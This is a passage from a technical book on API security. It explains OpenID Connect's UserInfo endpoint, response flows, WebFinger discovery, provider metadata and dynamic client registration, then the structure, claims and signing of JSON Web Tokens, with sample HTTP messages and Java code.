These identifiers should be understood by all of the authorization servers and client applications that support OpenID Connect. The complete set of OpenID Connect standard claims is defined in Section 5.1 of the OpenID Connect core specification, available at http://openid.net/specs/openid-connect-core-1_0.html. The other approach to request user attributes is via the UserInfo endpoint. The UserInfo endpoint is an OAuth 2.0-protected resource on the authorization server. Any request to this endpoint must carry a valid OAuth 2.0 token. Once again, there are two ways to get user attributes from the UserInfo endpoint. The first approach is to use the OAuth access token. With this approach, the client must specify the corresponding attribute scope in the authorization grant request. The OpenID Connect specification defines four scope values to request attributes: profile, email, address, and phone. If the scope value is set to profile, that implies that the client requests access to a set of CHAPTEr 6 OPEnID COnnECT (OIDC) 143 attributes, which includes name, family_name, given_name, middle_name, nickname, preferred_username, profile, picture, website, gender, birthdate, zoneinfo, locale, and updated_at. The following authorization grant request asks permission to access a user’s email address and phone number: Note The UserInfo endpoint must support both HTTP GET and POST. All communication with the UserInfo endpoint must be over Transport Layer Security (TLS). https://localhost:9443/oauth2/authorize? response_type=code &scope=openid phone email &client_id=NJ0LXcfdOW20EvD6DU0l0p01u_Ya &redirect_uri=https://localhost/callback This results in an authorization code response. Once the client application has exchanged the authorization code for an access token, by talking to the token endpoint of the authorization server, it can use the access token it received to talk to the UserInfo endpoint and get the user attributes corresponding to the access token: GET /userinfo HTTP/1.1 Host: auth.server.com Authorization: Bearer SJHkhew870hooi90 The preceding request to the UserInfo endpoint results in the following JSON message, which includes the user’s email address and phone number: HTTP/1.1 200 OK Content-Type: application/json { "phone": "94712841302", "email": "joe@authserver.com", } CHAPTEr 6 OPEnID COnnECT (OIDC) 144 The other way to retrieve user attributes from the UserInfo endpoint is through the claims parameter. The following example shows how to retrieve the email address of the user by talking to the OAuth-protected UserInfo endpoint: POST /userinfo HTTP/1.1 Host: auth.server.com Authorization: Bearer SJHkhew870hooi90 claims={ "userinfo": { "email": {"essential": true} } } Note Signing or encrypting the response message from the UserInfo endpoint isn’t a requirement. If it’s signed or encrypted, then the response should be wrapped in a JWT, and the Content-Type of the response should be set to application/jwt. OpenID Connect Flows All the examples in this chapter so far have used an authorization code grant type to request an ID token—but it isn’t a requirement. In fact OpenID Connect, independent of OAuth 2.0 grant types, defined a set of flows: code flow, implicit flow, and hybrid flow. Each of the flows defines the value of the response_type parameter. The response_type parameter always goes with the request to the authorize endpoint (in contrast the grant_ type parameter always goes to the token endpoint), and it defines the expected type of response from the authorize endpoint. 
If it is set to code, the authorize endpoint of the authorization server must return a code, and this flow is identified as the authorization code flow in OpenID Connect. For implicit flow under the context of OpenID Connect, the value of response_type can be either id_token or id_token token (separated by a space). If it's just id_token, then the authorization server returns an ID token from the authorize endpoint; if it includes both, then both the ID token and the access token are included in the response.

The hybrid flow can use different combinations. If the value of response_type is set to code id_token (separated by a space), then the response from the authorize endpoint includes the authorization code as well as the id_token. If it's code token (separated by a space), then it returns the authorization code along with an access token (for the UserInfo endpoint). If response_type includes all three (code token id_token), then the response includes an id_token, an access token, and the authorization code. Table 6-1 summarizes this discussion.

Table 6-1. OpenID Connect Flows

Type of Flow          response_type          Tokens Returned
Authorization code    code                   Authorization code
Implicit              id_token               ID token
Implicit              id_token token         ID token and access token
Hybrid                code id_token          ID token and authorization code
Hybrid                code id_token token    ID token, authorization code, and access token
Hybrid                code token             Access token and authorization code

Note When id_token is being used as the response_type in an OpenID Connect flow, the client application never has access to an access token. In such a scenario, the client application can use the scope parameter to request attributes, and those are added to the id_token.

Requesting Custom User Attributes

As discussed before, OpenID Connect defines 20 standard claims. These claims can be requested via the scope parameter or through the claims parameter. The only way to request custom-defined claims is through the claims parameter. The following is a sample OpenID Connect request that asks for custom-defined claims:

https://localhost:9443/oauth2/authorize?response_type=code
 &scope=openid
 &client_id=NJ0LXcfdOW20EvD6DU0l0p01u_Ya
 &redirect_uri=https://localhost/callback
 &claims=
 {
   "id_token": {
     "http://apress.com/claims/email": {"essential": true},
     "http://apress.com/claims/phone": {"essential": true},
   }
 }

OpenID Connect Discovery

At the beginning of the chapter, we discussed how OpenID relying parties discover OpenID providers through the user-provided OpenID (which is a URL). OpenID Connect Discovery addresses the same concern, but in a different way (see Figure 6-2). In order to authenticate users via OpenID Connect, the OpenID Connect relying party first needs to figure out what authorization server is behind the end user. OpenID Connect utilizes the WebFinger (RFC 7033) protocol for this discovery.

Note The OpenID Connect Discovery specification is available at http://openid.net/specs/openid-connect-discovery-1_0.html. If a given OpenID Connect relying party already knows who the authorization server is, it can simply ignore the discovery phase.

Let's assume a user called Peter visits an OpenID Connect relying party and wants to log in (see Figure 6-2). To authenticate Peter, the OpenID Connect relying party should know the authorization server corresponding to Peter. To discover this, Peter has to provide to the relying party some unique identifier that relates to him.
Using this identifier, the relying party should be able to find the WebFinger endpoint corresponding to Peter. Let’s say that the identifier Peter provides is his email address, peter@apress.com (step 1). The relying party should be able to find enough detail about the WebFinger endpoint using Peter’s email address. In fact, the relying party should be able to derive the WebFinger endpoint from the email address. The relying party can then send a query to the WebFinger endpoint to find out which authorization server (or the identity provider) corresponds to Peter (steps 2 and 3). This query is made according to the WebFinger specification. The following shows a sample WebFinger request for peter@ apress.com: GET /.well-known/webfinger?resource=acct:peter@apress.com &rel=http://openid.net/specs/connect/1.0/issuer HTTP/1.1 Host: apress.com Figure 6-2. OpenID Connect Discovery CHAPTEr 6 OPEnID COnnECT (OIDC) 148 The WebFinger request has two key parameters: resource and rel. The resource parameter should uniquely identify the end user, whereas the value of rel is fixed for OpenID Connect and must be equal to http://openid.net/specs/connect/1.0/ issuer. The rel (relation-type) parameter acts as a filter to determine the OpenID Connect issuer corresponding to the given resource. A WebFinger endpoint can accept many other discovery requests for different services. If it finds a matching entry, the following response is returned to the OpenID Connect relying party. The value of the OpenID identity provider or the authorization server endpoint is included in the response: HTTP/1.1 200 OK Access-Control-Allow-Origin: * Content-Type: application/jrd+json { "subject":"acct:peter@apress.com", "links":[ { "rel":"http://openid.net/specs/connect/1.0/issuer", "href":"https://auth.apress.com" } ] } Note neither the WebFinger nor the OpenID Connect Discovery specification mandates the use of the email address as the resource or the end user identifier. It must be a UrI that conforms to the UrI definition in rFC 3986, which can be used to derive the WebFinger endpoint. If the resource identifier is an email address, then it must be prefixed with acct. The acct is a UrI scheme as defined in http://tools.ietf.org/html/ draft-ietf-appsawg-acct-uri- 07. When the acct UrI scheme is being used, everything after the @ sign is treated as the hostname. The WebFinger hostname is derived from an email address as per the acct UrI scheme, which is the part after the @ sign. CHAPTEr 6 OPEnID COnnECT (OIDC) 149 If a UrL is being used as the resource identifier, the hostname (and port number) of the UrL is treated as the WebFinger hostname. If the resource identifier is https://auth.server.com:9443/prabath, then the WebFinger hostname is auth.server.com:9443. Once the endpoint of the identity provider is discovered, that concludes the role of WebFinger. Yet you don’t have enough data to initiate an OpenID Connect authentication request with the corresponding identity provider. You can find more information about the identity provider by talking to its metadata endpoint, which must be a well-known endpoint (steps 4 and 5 in Figure 6-2). After that, for the client application to talk to the authorization server, it must be a registered client application. The client application can talk to the client registration endpoint of the authorization server (steps 6 and 7) to register itself—and then can access the authorize and token endpoints (steps 8 and 9). 
Note Both the WebFinger and OpenID Connect Discovery specifications use the Defining Well-Known UrIs (http://tools.ietf.org/html/rfc5785) specification to define endpoint locations. The rFC 5785 specification introduces a path prefix called /.well-known/ to identify well-known locations. Most of the time, these locations are metadata endpoints or policy endpoints. The WebFinger specification has the well-known endpoint /.well-known/ webfinger. The OpenID Connect Discovery specification has the well-known endpoint for OpenID provider configuration metadata, /.well-known/openid- configuration. OpenID Connect Identity Provider Metadata An OpenID Connect identity provider, which supports metadata discovery, should host its configuration at the endpoint /.well-known/openid-configuration. In most cases, this is a nonsecured endpoint, which can be accessed by anyone. An OpenID Connect relying party can send an HTTP GET to the metadata endpoint to retrieve the OpenID provider configuration details as follows: GET /.well-known/openid-configuration HTTP/1.1 Host: auth.server.com CHAPTEr 6 OPEnID COnnECT (OIDC) 150 This results in the following JSON response, which includes everything an OpenID Connect relying party needs to know to talk to the OpenID provider or the OAuth authorization server: HTTP/1.1 200 OK Content-Type: application/json { "issuer":"https://auth.server.com", "authorization_endpoint":"https://auth.server.com/connect/authorize", "token_endpoint":"https://auth.server.com/connect/token", "token_endpoint_auth_methods_supported":["client_secret_basic", "private_ key_jwt"], "token_endpoint_auth_signing_alg_values_supported":["RS256", "ES256"], "userinfo_endpoint":"https://auth.sever.com/connect/userinfo", "check_session_iframe":"https://auth.server.com/connect/check_session", "end_session_endpoint":"https://auth.server.com/connect/end_session", "jwks_uri":"https://auth.server.com/jwks.json", "registration_endpoint":"https://auth.server.com/connect/register", "scopes_supported":["openid", "profile", "email", "address", "phone", "offline_access"], "response_types_supported":["code", "code id_token", "id_token", "token id_token"], "acr_values_supported":["urn:mace:incommon:iap:silver", "urn:mace:incommo n:iap:bronze"], "subject_types_supported":["public", "pairwise"], "userinfo_signing_alg_values_supported":["RS256", "ES256", "HS256"], "userinfo_encryption_alg_values_supported":["RSA1_5", "A128KW"], "userinfo_encryption_enc_values_supported":["A128CBC-HS256", "A128GCM"], "id_token_signing_alg_values_supported":["RS256", "ES256", "HS256"], "id_token_encryption_alg_values_supported":["RSA1_5", "A128KW"], "id_token_encryption_enc_values_supported":["A128CBC-HS256", "A128GCM"], "request_object_signing_alg_values_supported":["none", "RS256", "ES256"], "display_values_supported":["page", "popup"], "claim_types_supported":["normal", "distributed"], "claims_supported":["sub", "iss", "auth_time", "acr", "name", "given_name", "family_name", "nickname", CHAPTEr 6 OPEnID COnnECT (OIDC) 151 "profile", "picture", "website","email", "email_verified", "locale", "zoneinfo", "http://example.info/claims/groups"], "claims_parameter_supported":true, "service_documentation":"http://auth.server.com/connect/service_ documentation.html", "ui_locales_supported":["en-US", "fr-CA"] } Note If the endpoint of the discovered identity provider is https://auth. server.com, then the OpenID provider metadata should be available at https://auth.server.com/.well-known/openid-configuration. 
If the endpoint is https://auth.server.com/openid, then the metadata endpoint is https://auth.server.com/openid/.well-known/openid- configuration. Dynamic Client Registration Once the OpenID provider endpoint is discovered via WebFinger (and all the metadata related to it through OpenID Connect Discovery), the OpenID Connect relying party still needs to have a client ID and a client secret (not under the implicit grant type) registered at the OpenID provider to initiate the authorization grant request or the OpenID Connect authentication request. The OpenID Connect Dynamic Client Registration specification2 facilitates a mechanism to register dynamically OpenID Connect relying parties at the OpenID provider. The response from the OpenID provider metadata endpoint includes the endpoint for client registration under the parameter registration_endpoint. To support dynamic client registrations, this endpoint should accept open registration requests, with no authentication requirements. 2 http://openid.net/specs/openid-connect-registration-1_0.html CHAPTEr 6 OPEnID COnnECT (OIDC) 152 To fight against denial of service (DoS) attacks, the endpoint can be protected with rate limits or with a web application firewall (WAF). To initiate client registration, the OpenID relying party sends an HTTP POST message to the registration endpoint with its own metadata. The following is a sample client registration request: POST /connect/register HTTP/1.1 Content-Type: application/json Accept: application/json Host: auth.server.com { "application_type":"web", "redirect_uris":["https://app.client.org/callback","https://app.client.org/ callback2"], "client_name":"Foo", "logo_uri":"https://app.client.org/logo.png", "subject_type":"pairwise", "sector_identifier_uri":"https://other.client.org /file_of_redirect_uris. json", "token_endpoint_auth_method":"client_secret_basic", "jwks_uri":"https://app.client.org/public_keys.jwks", "userinfo_encrypted_response_alg":"RSA1_5", "userinfo_encrypted_response_enc":"A128CBC-HS256", "contacts":["prabath@wso2.com", "prabath@apache.org"], "request_uris":["https://app.client.org/rf.txt#qpXaRLh_ n93TTR9F252ValdatUQvQiJi5BDub2BeznA"] } In response, the OpenID Connect provider or the authorization server sends back the following JSON message. It includes a client_id and a client_secret: HTTP/1.1 201 Created Content-Type: application/json Cache-Control: no-store Pragma: no-cache { "client_id":"Gjjhj678jhkh89789ew", CHAPTEr 6 OPEnID COnnECT (OIDC) 153 "client_secret":"IUi989jkjo_989klkjuk89080kjkuoikjkUIl", "client_secret_expires_at":2590858900, "registration_access_token":"this.is.an.access.token.value.ffx83", "registration_client_uri":"https://auth.server.com/connect/register?client_ id=Gjjhj678jhkh89789ew ", "token_endpoint_auth_method":"client_secret_basic", "application_type": "web", "redirect_uris":["https://app.client.org/callback","https://app.client.org/ callback2"], "client_name":"Foo", "logo_uri":"https://client.example.org/logo.png", "subject_type":"pairwise", "sector_identifier_uri":"https://other.client.org/file_of_redirect_uris. json", "jwks_uri":"https://app.client.org/public_keys.jwks", "userinfo_encrypted_response_alg":"RSA1_5", "userinfo_encrypted_response_enc":"A128CBC-HS256", "contacts":["prabath@wso2.com", "prabath@apache.org"], "request_uris":["https://app.client.org/rf.txt#qpXaRLh_ n93TTR9F252ValdatUQvQiJi5BDub2BeznA"] } Once the OpenID Connect relying party obtains a client ID and a client secret, it concludes the OpenID Connect Discovery phase. 
The relying party can now initiate the OpenID Connect authentication request. Note Section 2.0 of the OpenID Connect Dynamic Client registration specification lists all the attributes that can be included in an OpenID Connect client registration request: http://openid.net/specs/openid-connect- registration-1_0.html. OpenID Connect for Securing APIs So far, you have seen a detailed discussion about OpenID Connect. But in reality, how will it help you in securing APIs? The end users can use OpenID Connect to authenticate CHAPTEr 6 OPEnID COnnECT (OIDC) 154 into web applications, mobile applications, and much more. Nonetheless, why would you need OpenID Connect to secure a headless API? At the end of the day, all the APIs are secured with OAuth 2.0, and you need to present an access token to talk to the API. The API (or the policy enforcement component) validates the access token by talking to the authorization server. Why would you need to pass an ID token to an API? OAuth is about delegated authorization, whereas OpenID Connect is about authentication. An ID token is an assertion about your identity, that is, a proof of your identity. It can be used to authenticate into an API. As of this writing, no HTTP binding is defined for JWT. The following example suggests passing the JWT assertion (or the ID token) to a protected API as an access token in the HTTP Authorization header. The ID token, or the signed JWT, is base64-url-encoded in three parts. Each part is separated by a dot (.). The first part up to the first dot is the JWT header. The second part is the JWT body. The third part is the signature. Once the JWT is obtained by the client application, it can place it in the HTTP Authorization header in the manner shown here: POST /employee HTTP/1.1 Content-Type: application/json Accept: application/json Host: resource.server.com Authorization: Bearer eyJhbGciOiljiuo98kljlk2KJl. IUojlkoiaos298jkkdksdosiduIUiopo.oioYJ21sajds { "empl_no":"109082", "emp_name":"Peter John", "emp_address":“Mountain View, CA, USA” } To validate the JWT, the API (or the policy enforcement component) has to extract the JWT assertion from the HTTP Authorization header, base64-url-decode it, and validate the signature to see whether it’s signed by a trusted issuer. In addition, the claims in the JWT can be used for authentication and authorization. CHAPTEr 6 OPEnID COnnECT (OIDC) 155 Note When an OpenID Connect identity provider issues an ID token, it adds the aud parameter to the token to indicate the audience of the token. This can be an array of identifiers. When using ID tokens to access APIs, a UrI known to the API should also be added to the aud parameter. Currently this can’t be requested in the OpenID Connect authentication request, so it must be set out of band at the OpenID Connect identity provider. Summary • OpenID Connect was built on top of OAuth 2.0. It introduces an identity layer on top of OAuth 2.0. This identity layer is abstracted into an ID token, which is a JSON Web Token (JWT). • OpenID Connect evolved from OpenID to an OAuth 2.0 profile. • The OpenID Connect Dynamic Client Registration specification facilitates a mechanism to register dynamically OpenID Connect relying parties at the OpenID provider. • OpenID Connect defines two ways to request user attributes. The client application can either use the initial OpenID Connect authentication request to request attributes or else later talk to the UserInfo endpoint hosted by the authorization server. 
• OpenID Connect utilizes the WebFinger protocol in its discovery process along with OpenID Connect dynamic client registration and identity provider metadata configuration. • An OpenID Connect identity provider, which supports metadata discovery, should host its configuration at the endpoint /.well- known/openid-configuration. CHAPTEr 6 OPEnID COnnECT (OIDC) 157 © Prabath Siriwardena 2020 P. Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4_7 CHAPTER 7 Message-Level Security with JSON Web Signature JavaScript Object Notation (JSON) provides a way of exchanging data in a language- neutral, text-based, and lightweight manner. It was originally derived from the ECMAScript programming language. JSON and XML are the most commonly used data exchange formats for APIs. Observing the trend over the last few years, it’s quite obvious that JSON is replacing XML. Most of the APIs out there have support for JSON, and some support both JSON and XML. XML-only APIs are quite rare. Understanding JSON Web Token (JWT) JSON Web Token (JWT) defines a container to transport data between interested parties in JSON. It became an IETF standard in May 2015 with the RFC 7519. The OpenID Connect specification, which we discussed in Chapter 6, uses a JWT to represent the ID token. Let’s examine an OpenID Connect ID token returned from the Google API, as an example (to understand JWT, you do not need to know about OpenID Connect): eyJhbGciOiJSUzI1NiIsImtpZCI6Ijc4YjRjZjIzNjU2ZGMzOTUzNjRmMWI2YzAyOTA3 NjkxZjJjZGZmZTEifQ.eyJpc3MiOiJhY2NvdW50cy5nb29nbGUuY29tIiwic3ViIjoiMT EwNTAyMjUxMTU4OTIwMTQ3NzMyIiwiYXpwIjoiODI1MjQ5ODM1NjU5LXRlOHF nbDcwMWtnb25ub21ucDRzcXY3ZXJodTEyMTFzLmFwcHMuZ29vZ2xldXNlcmNvb nRlbnQuY29tIiwiZW1haWwiOiJwcmFiYXRoQHdzbzIuY29tIiwiYXRfaGFzaCI6InpmO DZ2TnVsc0xCOGdGYXFSd2R6WWciLCJlbWFpbF92ZXJpZmllZCI6dHJ1ZSwiYXVkI joiODI1MjQ5ODM1NjU5LXRlOHFnbDcwMWtnb25ub21ucDRzcXY3ZXJodTEyMTFz LmFwcHMuZ29vZ2xldXNlcmNvbnRlbnQuY29tIiwiaGQiOiJ3c28yLmNvbSIsImlhdCI6 MTQwMTkwODI3MSwiZXhwIjoxNDAxOTEyMTcxfQ.TVKv-pdyvk2gW8sGsCbsnkq 158 srS0T-H00xnY6ETkIfgIxfotvFn5IwKm3xyBMpy0FFe0Rb5Ht8AEJV6PdWyxz8rMgX 2HROWqSo_RfEfUpBb4iOsq4W28KftW5H0IA44VmNZ6zU4YTqPSt4TPhyFC9fP2D _Hg7JQozpQRUfbWTJI Note Way before JWT, in 2009, Microsoft introduced Simple Web Token (SWT).1 It is neither JSON nor XML. It defined its own token format to carry out a set of HTML form–encoded name/value pairs. Both JWTs and SWTs define a way to carry claims between applications. In SWT, both the claim names and claim values are strings, while in JWT claim names are strings, but claim values can be any JSON type. Both of these token types offer cryptographic protection for their content: SWTs with HMAC SHA256 and JWTs with a choice of algorithms, including signature, MAC, and encryption algorithms. Even though SWT was developed as a proposal for IETF, it never became an IETF proposed standard. Dick Hardt was the editor of the SWT specification, who also played a major role later in building the OAuth WRAP specification, which we discuss in Appendix B. JOSE Header The preceding JWT has three main elements. Each element is base64url-encoded and separated by a period (.). Appendix E explains how base64url encoding works in detail. Let’s identify each individual element in the JWT. The first element of the JWT is called the JavaScript Object Signing and Encryption (JOSE) header. The JOSE header lists out the properties related to the cryptographic operations applied on the JWT claims set (which we explain later in this chapter). 
The following is the base64url-encoded JOSE header of the preceding JWT: eyJhbGciOiJSUzI1NiIsImtpZCI6Ijc4YjRjZjIzNjU2ZGMzOTUzNjRmMWI2YzAyOTA3 NjkxZjJjZGZmZTEifQ To make the JOSE header readable, we need to base64url-decode it. The following shows the base64url-decoded JOSE header, which defines two attributes, the algorithm (alg) and key identifier (kid). {"alg":"RS256","kid":"78b4cf23656dc395364f1b6c02907691f2cdffe1"} 1 Simple Web Token, http://msdn.microsoft.com/en-us/library/hh781551.aspx CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 159 Both the alg and kid parameters are not defined in the JWT specification, but in the JSON Web Signature (JWS) specification. Let’s briefly identify here what these parameters mean and will discuss in detail when we explain JWS. The JWT specification is not bound to any specific algorithm. All applicable algorithms are defined under the JSON Web Algorithms (JWA) specification, which is the RFC 7518. Section 3.1 of RFC 7518 defines all possible alg parameter values for a JWS token. The value of the kid parameter provides an indication or a hint about the key, which is used to sign the message. Looking at the kid, the recipient of the message should know where to look up for the key and find it. The JWT specification only defines two parameters in the JOSE header; the following lists out those: • typ (type): The typ parameter is used to define the media type of the complete JWT. A media type is an identifier, which defines the format of the content, transmitted over the Internet. There are two types of components that process a JWT: the JWT implementations and JWT applications. Nimbus2 is a JWT implementation in Java. The Nimbus library knows how to build and parse a JWT. A JWT application can be anything, which uses JWTs internally. A JWT application uses a JWT implementation to build or parse a JWT. The typ parameter is just another parameter for the JWT implementation. It will not try to interpret the value of it, but the JWT application would. The typ parameter helps JWT applications to differentiate the content of the JWT when the values that are not JWTs could also be present in an application data structure along with a JWT object. This is an optional parameter, and if present for a JWT, it is recommended to use JWT as the media type. • cty (content type): The cty parameter is used to define the structural information about the JWT. It is only recommended to use this parameter in the case of a nested JWT. The nested JWTs are discussed in Chapter 8, and the definition of the cty parameter is further explained there. 2 Nimbus JWT Java implementation, http://connect2id.com/products/nimbus-jose-jwt CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 160 JWT Claims Set The second element of the JWT is known as either the JWT payload or the JWT claims set. It is a JSON object, which carries the business data. 
The following is the base64url- encoded JWT claims set of the preceding JWT (which is returned from the Google API); it includes information about the authenticated user: eyJpc3MiOiJhY2NvdW50cy5nb29nbGUuY29tIiwic3ViIjoiMTEwNTAyMjUxMTU4OT IwMTQ3NzMyIiwiYXpwIjoiODI1MjQ5ODM1NjU5LXRlOHFnbDcwMWtnb25ub21uc DRzcXY3ZXJodTEyMTFzLmFwcHMuZ29vZ2xldXNlcmNvbnRlbnQuY29tIiwiZW1ha WwiOiJwcmFiYXRoQHdzbzIuY29tIiwiYXRfaGFzaCI6InpmODZ2TnVsc0xCOGdGYX FSd2R6WWciLCJlbWFpbF92ZXJpZmllZCI6dHJ1ZSwiYXVkIjoiODI1MjQ5ODM1NjU 5LXRlOHFnbDcwMWtnb25ub21ucDRzcXY3ZXJodTEyMTFzLmFwcHMuZ29vZ2xld XNlcmNvbnRlbnQuY29tIiwiaGQiOiJ3c28yLmNvbSIsImlhdCI6MTQwMTkwODI3MS wiZXhwIjoxNDAxOTEyMTcxfQ To make the JWT claims set readable, we need to base64url-decode it. The following shows the base64url-decoded JWT claims set. Whitespaces can be explicitly retained while building the JWT claims set—no canonicalization is required before base64url- encoding. Canonicalization is the process of converting different forms of a message into a single standard form. This is used mostly before signing XML messages. In XML, the same message can be represented in different forms to carry the same meaning. For example, <vehicles><car></car></vehicles> and <vehicles><car/></vehicles> are equivalent in meaning, but have two different canonical forms. Before signing an XML message, you should follow a canonicalization algorithm to build a standard form. { "iss":"accounts.google.com", "sub":"110502251158920147732", "azp":"825249835659-te8qgl701kgonnomnp4sqv7erhu1211s.apps. googleusercontent.com", "email":"prabath@wso2.com", "at_hash":"zf86vNulsLB8gFaqRwdzYg", "email_verified":true, "aud":"825249835659-te8qgl701kgonnomnp4sqv7erhu1211s.apps. googleusercontent.com", CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 161 "hd":"wso2.com", "iat":1401908271, "exp":1401912171 } The JWT claims set represents a JSON object whose members are the claims asserted by the JWT issuer. Each claim name within a JWT must be unique. If there are duplicate claim names, then the JWT parser could either return a parsing error or just return back the claims set with the very last duplicate claim. JWT specification does not explicitly define what claims are mandatory and what are optional. It’s up to each application of JWT to define mandatory and optional claims. For example, the OpenID Connect specification, which we discussed in detail in Chapter 6, defines the mandatory and optional claims. The JWT specification defines three classes of claims: registered claims, public claims, and private claims. The registered claims are registered in the Internet Assigned Numbers Authority (IANA) JSON Web Token Claims registry. Even though these claims are treated as registered claims, the JWT specification doesn’t mandate their usage. It’s totally up to the other specifications which are built on top of JWT to decide which are mandatory and which aren’t. For example, in OpenID Connect specification, iss is a mandatory claim. The following lists out the registered claims set as defined by the JWT specification: • iss (issuer): The issuer of the JWT. This is treated as a case-sensitive string value. Ideally, this represents the asserting party of the claims set. If Google issues the JWT, then the value of iss would be accounts.google.com. This is an indication to the receiving party who the issuer of the JWT is. 
• sub (subject): The token issuer or the asserting party issues the JWT for a particular entity, and the claims set embedded into the JWT normally represents this entity, which is identified by the sub parameter. The value of the sub parameter is a case-sensitive string value. • aud (audience): The token issuer issues the JWT to an intended recipient or a list of recipients, which is represented by the aud parameter. The recipient or the recipient list should know how to parse the JWT and validate it. Prior to any validation check, it must first see whether the particular JWT is issued for its use and if not should reject immediately. The value of the aud parameter can be a case-sensitive string value or an array of strings. The token issuer should know, prior to issuing the token, who the intended CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 162 recipient (or the recipients) of the token is, and the value of the aud parameter must be a pre-agreed value between the token issuer and the recipient. In practice, one can also use a regular expression to validate the audience of the token. For example, the value of the aud in the token can be *.apress.com, while each recipient under the apress.com domain can have its own aud values: foo.apress. com, bar.apress.com likewise. Instead of finding an exact match for the aud value, each recipient can just check whether the aud value matches the regular expression: (?:[a-zA-Z0-9]*|\*).apress.com. This will make sure that any recipient can use a JWT, which is having any subdomain of apress.com. • exp (expiration time): Each JWT carries an expiration time. The recipient of the JWT token must reject it, if that token has expired. The issuer can decide the value of the expiration time. The JWT specification does not recommend or provide any guidelines on how to decide the best token expiration time. It’s a responsibility of the other specifications, which use JWT internally to provide such recommendations. The value of the exp parameter is calculated by adding the expiration time (from the token issued time) in seconds to the time elapsed from 1970-01-01T00:00:00Z UTC to the current time. If the token issuer’s clock is out of sync with the recipient’s clock (irrespective of their time zone), then the expiration time validation could fail. To fix that, each recipient can add a couple of minutes as the clock skew during the validation process. • nbf (not before): The recipient of the token should reject it, if the value of the nbf parameter is greater than the current time. The JWT is not good enough to use prior to the value indicated in the nbf parameter. The value of the nbf parameter is the number of seconds elapsed from 1970-01-01T00:00:00Z UTC to the not before time. • iat (issued at): The iat parameter in the JWT indicates the issued time of the JWT as calculated by the token issuer. The value of the iat parameter is the number of seconds elapsed from 1970-01-01T00:00:00Z UTC to the current time, when the token is issued. CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 163 • jti (JWT ID): The jti parameter in the JWT is a unique token identifier generated by the token issuer. If the token recipient accepts JWTs from multiple token issuers, then this value may not be unique across all the issuers. In that case, the token recipient can maintain the token uniqueness by maintaining the tokens under the token issuer. The combination of the token issuer identifier + the jti should produce a unique token identifier. 
The public claims are defined by the other specifications, which are built on top of JWT. To avoid any collisions in such cases, names should either be registered in the IANA JSON Web Token Claims registry or defined in a collision-resistant manner with a proper namespace. For example, the OpenID Connect specification defines its own set of claims, which are included inside the ID token (the ID token itself is a JWT), and those claims are registered in the IANA JSON Web Token Claims registry. The private claims should indeed be private and shared only between a given token issuer and a selected set of recipients. These claims should be used with caution, because there is a chance for collision. If a given recipient accepts tokens from multiple token issuers, then the semantics of the same claim may be different from one issuer to another, if it is a private claim. JWT Signature The third part of the JWT is the signature, which is also base64url-encoded. The cryptographic parameters related to the signature are defined in the JOSE header. In this particular example, Google uses RSASSA-PKCS1-V1_53 with the SHA256 hashing algorithm, which is expressed by value of the alg parameter in the JOSE header: RS256. The following shows the signature element of the JWT returned back from Google. The signature itself is not human readable—so there is no point of trying to base64url-decode the following: TVKv-pdyvk2gW8sGsCbsnkqsrS0TH00xnY6ETkIfgIxfotvFn5IwKm3xyBMpy0 FFe0Rb5Ht8AEJV6PdWyxz8rMgX2HROWqSo_RfEfUpBb4iOsq4W28KftW5 H0IA44VmNZ6zU4YTqPSt4TPhyFC-9fP2D_Hg7JQozpQRUfbWTJI 3 RSASSA-PKCS1-V1_5 is defined in RFC 3447: www.ietf.org/rfc/rfc3447.txt. It uses the signer’s RSA private key to sign the message in the way defined by PKCS#1. CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 164 GENERATING A PLAINTEXT JWT The plaintext JWT doesn’t have a signature. It has only two parts. The value of the alg parameter in the JOSE header must be set to none. The following Java code generates a plaintext JWT. you can download the complete Java sample as a Maven project from https://github.com/apisecurity/samples/tree/master/ch07/sample01. public static String buildPlainJWT() { // build audience restriction list. List<String> aud = new ArrayList<String>(); aud.add("https://app1.foo.com"); aud.add("https://app2.foo.com"); Date currentTime = new Date(); // create a claims set. JWTClaimsSet jwtClaims = new JWTClaimsSet.Builder(). // set the value of the issuer. issuer("https://apress.com"). // set the subject value - JWT belongs to // this subject. subject("john"). // set values for audience restriction. audience(aud). // expiration time set to 10 minutes. expirationTime(new Date(new Date().getTime() + 1000 * 60 * 10)). // set the valid from time to current time. notBeforeTime(currentTime). // set issued time to current time. issueTime(currentTime). // set a generated UUID as the JWT // identifier. jwtID(UUID.randomUUID().toString()). build(); CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 165 // create plaintext JWT with the JWT claims. PlainJWT plainJwt = new PlainJWT(jwtClaims); // serialize into string. String jwtInText = plainJwt.serialize(); // print the value of the JWT. System.out.println(jwtInText); return jwtInText; } To build and run the program, execute the following Maven command from the ch07/ sample01 directory. \> mvn test -Psample01 The preceding code produces the following output, which is a JWT. 
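To see what signature validation looks like in code, the following is a minimal sketch using the open source Nimbus library, the same library used for the samples later in this chapter. It assumes the recipient has already obtained the issuer's RSA public key; how that key is distributed is a deployment decision. A successful verify call only proves the token was signed with the corresponding private key, so the recipient still has to validate claims such as exp, aud, and iss as discussed above.

import java.security.interfaces.RSAPublicKey;

import com.nimbusds.jose.crypto.RSASSAVerifier;
import com.nimbusds.jwt.SignedJWT;

public class ValidateRSASignature {

    // Parses a signed JWT (like the Google ID token above) and checks its
    // RSA signature against the issuer's public key.
    public static boolean verify(String jwtInText, RSAPublicKey publicKey)
            throws Exception {
        // Parse the compact serialization into header, payload, and signature.
        SignedJWT signedJWT = SignedJWT.parse(jwtInText);
        // Verify the signature with the issuer's public key.
        RSASSAVerifier verifier = new RSASSAVerifier(publicKey);
        return signedJWT.verify(verifier);
    }
}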
